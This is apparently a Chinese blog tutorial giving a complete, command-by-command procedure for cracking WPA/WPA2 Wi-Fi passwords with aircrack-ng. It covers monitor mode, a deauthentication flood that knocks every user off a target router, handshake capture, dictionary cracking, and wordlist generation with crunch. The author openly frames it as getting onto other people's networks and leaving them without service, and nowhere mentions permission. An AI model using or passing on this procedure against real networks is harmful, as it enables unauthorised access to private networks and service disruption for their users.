用aircrack-ng套件破解wifi

简介:
aircrack-ng套件是用来破解wifi的工具（我只知道这一个用法😄），当然这么强的东西肯定不是用来破解wifi的，度娘说:Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件，主要功能有：网络侦测，数据包嗅探，WEP和WPA/WPA2-PSK破解

如何安装该套件？最简单的方法就是安装kali系统，自带这个套件，如果要在其他系统安装可以去aircrack-ng官网下载安装，安装的文章到处都是，不过安装的过程很坎坷，可能会遇到各种问题，这里先不赘述，回头再总结

OK，下面我来介绍一下我们破解wifi要用到哪些指令（后边的用法仅仅是在破解wifi的时候我的通俗解释）:
airmon-ng	改变网卡模式的工具
airodump-ng	监听网卡数据的工具
aireplay-ng	鼓捣网络AP的工具
aircrack-ng	跑包的工具

总体套路是这样的
1.开启网卡监听模式（需要网卡支持监听模式才可以）
2.开启监听
3.把所有人搞掉线，让他们重连（这一步看起来很有意思👿）
4.当其他人重连的时候可能会抓到连接的4次握手包，没抓到的话还要再搞他们一次😄
5.用抓到的包跑字典，跑到密码就成功啦~

下面是具体做法:
1.输入命令:ifconfig
查看你有哪些网卡，你可能会看到以下数据:
=======================================================================
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
	options=3<RXCSUM,TXCSUM>
	inet6 ::1 prefixlen 128 
	inet 127.0.0.1 netmask 0xff000000 
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1 
	nd6 options=1<PERFORMNUD>
gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
stf0: flags=0<> mtu 1280
wlan0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether c8:69:cd:99:cd:a6 
	inet6 fe80::ca69:cdff:fe99:cda6%en0 prefixlen 64 scopeid 0x4 
	inet 192.168.1.102 netmask 0xffffff00 broadcast 192.168.1.255
	nd6 options=1<PERFORMNUD>
	media: autoselect
	status: active
wlan1: flags=963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX> mtu 1500
	options=60<TSO4,TSO6>
	ether 9a:00:04:c1:bf:d0 
	media: autoselect <full-duplex>
	status: inactive
=======================================================================
这个en0就是你的网卡，可以看到wlan0:后边有一行inet 192.168.1.102，这是在联网的情况下，你的ip，如果没联网是没有的，可能是wlan1那种状态，kali的可能会看到有网卡名字叫en0，或en1这也可以。这就是你的网卡。

2.启动监听模式，启动网卡的监听模式首先需要网卡支持这个模式，启动监听模式后这个网卡就不能上网了，不能上网又如何，咱不就是要破解wifi的嘛，上别人的网，让别人没网可上😄。
输入命令:airmon-ng start wlan0（wlan0是我网卡的名字，你的可能是en0）
这条指令就是启动监听模式
启动成功后会看到你的网卡名后边Chipset字段下有好长一串文字，说什么monitor mode什么的，还说你的网卡名变成了wlan0mon（或者是en0mon）这就是成功了，如果没成功说有什么冲突，需要执行airmon-ng check kill这个指令来干嘛干嘛的，那你就执行以下airmon-ng check kill这个指令，再做一次airmon-ng start en0这个操作，成功会看到如下返回信息:
=======================================================================
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!

PID Name
776 NetworkManager
865 wpa_supplicant

PHY	Interface	Dirver		Chipset
phy0	en0		iwlwifi		Intel Corporation Centrino Wireless-N 2230 (rev c4)
					(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)(*特别注意这句话，这句话就是成功了，没有就是没成功，wlan0mon就是已经开启监听模式的新的网卡名)
=======================================================================
*这时候再ifconfig会发现原来的wlan0变成了wlan0mon，这就启动成功了

3.监听附近wifi
输入命令:airodump-ng wlan0mon（wlan0mon是刚才启动监听模式成功的新的网卡名）
输入这个指令后如果附近有wifi你会看到有很多的wifi被扫描出来，就像这样:
=======================================================================
CH 6 ][ Elapsed: 48 s ][ 2016-03-10 00:40][ WPA handshake: 28:2B:3F:AF:CC:24

BSSID			PWR  Beacons	#Data,#/s  CH  MB   ENC  CIPER  AUTH  ESSID

C0:34:63:3F:0A:CB	-50 	 133	    4   0  11  54e. WPA2 CCMP   PSK   ABC
MAC地址			信号     不知道	  传输数据吧 信道 不知  加密方式？ 不知  验证？ wifi的名字
上边这就是扫描到的wifi，我对应解释了下这些参数都是什么意思

=======================================================================

4.监听指定wifi
输入指令:airodump-ng -w /tmp/test.cap -c 11 --bssid 40:16:97:76:E7:DE wlan0mon --ignore-negative-one
-w /tmp/test.cap，-w是写入文件，后跟文件路径，一般是.cap结尾，如果抓到握手包，这个就是握手包，就可以用这个来跑
-c 11，是信道，后跟数字是信道的标号
—bossid 40:16:97:76:E7:DE 是路由的MAC地址
wlan0mon 是网卡名
最后的参数不知道什么意思，忽略什么东西
显示的东西和第3条指令一样，如果出现WPA handshake: 40:16:97:76:E7:DE就说明抓到握手包了，恭喜你，可以跑包了!

5.让用户下线
输入命令:aireplay-ng -0 0 -a 40:16:97:76:E7:DE wlan0mon
-0 是死亡模式，我也不知道啥叫死亡模式，反正非常酷就对了
0 是-0后边的0，这点要注意，这个数字是发送多少次这种阻塞，0就是一直发，这样目标路由的所有用户就永远连不上了，这样当然不行，一般我都设置10，阻塞10次之后让用户可以继续重连，这样就有机会抓取到握手包
-a 后跟路由器的MAC地址
wlan0mon 网卡名
*解释一下，握手包是用户在连接wifi的时候传递密码的包，经过4次握手，最终链接路由（AP），我们要抓的就是这个握手包。但用户一直连着不断开，也不重连，如何能抓到握手包呢，就是用上边的指令让用户下线，当他重连的时候，你就有机会抓到握手包

6.跑包
输入指令:aircrack-ng -w passDic.txt test.cap
-w 后边跟字典文件
passDic.txt 字典文件，字典就是里边包含很多很多密码的文件，一行一个密码，一个一个跑
test.cap 握手包文件，这个就是上边几部抓到的握手包
终于看到我们的主角了，aircrack-ng，这是一个跑包的工具，在网上找到各种字典就可以跑包了，字典包就是一行一个密码组成的txt文件，你自己也可以做，不过那要耗费相当的人力物力精力，可以用kali自带的字典生成工具crunch

7.生成字典
输入指令:crunch <最小位> <最大位> <-t定义输出格式> <n个字母或数的排列组合>/<@字母>/<%数字> <-o> <文件名>
示例:crunch 5 5 -t 123@% -o tmpDic.txt
以上指令表示生成最小5位最大5位，也就是5位的密码，以数字123开头，第4位是一个字母，第五位是一个数字，输出到tmpDic.txt
另外，注意生成字典的大小，小心爆盘！以单纯的8位大小写英文+数组组合，生成的txt大概是1787TB，可别说我没提醒你
生成字典又是另一门学问了，可以看我另一篇关于crunch的文章。